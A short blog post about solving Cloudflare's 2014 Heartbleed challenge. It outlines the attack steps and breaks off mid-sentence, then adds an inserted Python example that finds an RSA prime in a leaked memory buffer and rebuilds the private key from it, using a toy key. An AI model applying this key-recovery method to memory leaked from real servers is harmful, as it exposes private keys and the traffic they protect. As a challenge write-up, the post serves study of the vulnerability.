Cracking Cloudflare's heartbleed challenge

Copyright Fedor Indutny

On April 11th 2014 Cloudflare published a blog post inviting readers to try extracting the private key of their specially prepared challenge site using the Heartbleed OpenSSL vulnerability. Being busy at the time, I decided to give it a try a couple of hours later, if no one had cracked it yet. This was a legal way to do some hackery, after all!

The method of attack was the following:

1. Send a lot of random-sized fake heartbeats (without body)
2. Try to find a 128-byte prime factor of the certificate's modulus
3. Generate the rest of the private key's parameters out of it

I wasn't searching for a PEM-encoded private key and/or -----BEGIN RSA PRIVATE KEY----- for a couple of reasons:

- It is loaded only at the process startup
- The key may be encrypted, and there is no point in brute forcing it
- According to my tests, DER-encoded...
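Steps 2 and 3 of the method, as an added example that is not code from the original post: it scans a captured memory buffer for a window that divides the public modulus, then derives the remaining RSA parameters, which is why a single exposed prime means the key must be treated as fully compromised. The toy key (two Mersenne primes), the 16-byte factor length, the buffer contents and the function names are all constructed for illustration; trying both byte orders is an assumption about how the big number sits in memory.

```python
from math import gcd

def find_prime_factor(leak: bytes, n: int, factor_len: int = 128):
    """Slide a factor_len-byte window over the buffer; return a factor of n or None."""
    for off in range(len(leak) - factor_len + 1):
        window = leak[off:off + factor_len]
        # Assumption: the in-memory byte order is unknown, so test both.
        for order in ("little", "big"):
            cand = int.from_bytes(window, order)
            if 1 < cand < n and n % cand == 0:
                return cand
    return None

def rebuild_private_key(p: int, n: int, e: int = 65537) -> dict:
    """Derive the other RSA private parameters (CRT form) from one prime."""
    q = n // p
    phi = (p - 1) * (q - 1)
    if p * q != n or gcd(e, phi) != 1:
        raise ValueError("p is not a usable factor of n")
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return {"n": n, "e": e, "d": d, "p": p, "q": q,
            "dp": d % (p - 1), "dq": d % (q - 1), "qinv": pow(q, -1, p)}

# Constructed toy key: real 2048-bit keys have 128-byte primes (factor_len=128).
P = 2**127 - 1          # Mersenne prime, 16 bytes
Q = 2**107 - 1          # Mersenne prime
N = P * Q
FILLER = bytes(range(256))                              # constructed "other memory"
LEAK = FILLER[:100] + P.to_bytes(16, "little") + FILLER  # constructed buffer

def demo():
    p = find_prime_factor(LEAK, N, factor_len=16)
    return rebuild_private_key(p, N) if p else None

if __name__ == "__main__":
    key = demo()
    print("recovered factor:", hex(key["p"]))
    print("private exponent:", hex(key["d"]))
```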

Linked on 2014-04-15 21:31:59